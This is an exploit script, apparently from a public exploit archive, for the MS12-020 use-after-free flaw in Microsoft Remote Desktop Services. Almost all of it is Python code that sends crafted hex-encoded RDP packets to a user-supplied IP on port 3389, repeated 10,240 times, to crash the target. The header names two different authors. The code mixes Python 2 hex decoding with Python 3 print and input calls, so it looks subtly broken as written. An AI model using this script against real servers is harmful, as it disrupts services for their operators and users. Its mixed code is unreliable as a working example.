# Exploit Title: Pakyu Cenloder
# Date: March 16 2012
# Author: BMario
# Application Link: Microsoft Terminal Services / Remote Desktop Services
#          http://msdn.microsoft.com/en-us/library/aa383015(v=vs.85).aspx
# Version: any Windows version before 13 Mar 2012
# Platforms:    Windows
# Bug:          use after free
# Exploitation: remote, versus server
# Author:       Stanley Marshall
# Tested on: Windows 7 32bit
# CVE : MS12-020

import socket
import sys

print("Microsoft Terminal Services / Remote Desktop Services - Denial of Service")

headpack = "030000130ee000000000000100080000000000".decode('hex')
dafuq = "030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0".decode(
    'hex')
dafree = "0300000802f08028".decode('hex')

trololo = headpack + dafuq + dafree

#HOSTNYO = sys.argv[1]
HOSTNYO = input("Enter the IP address to crash (remote desktop): ")
PORTNYO = 3389
for i in range(10240):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOSTNYO, PORTNYO))
    s.send(trololo)
    rec = s.recv(1024)
    s.close()
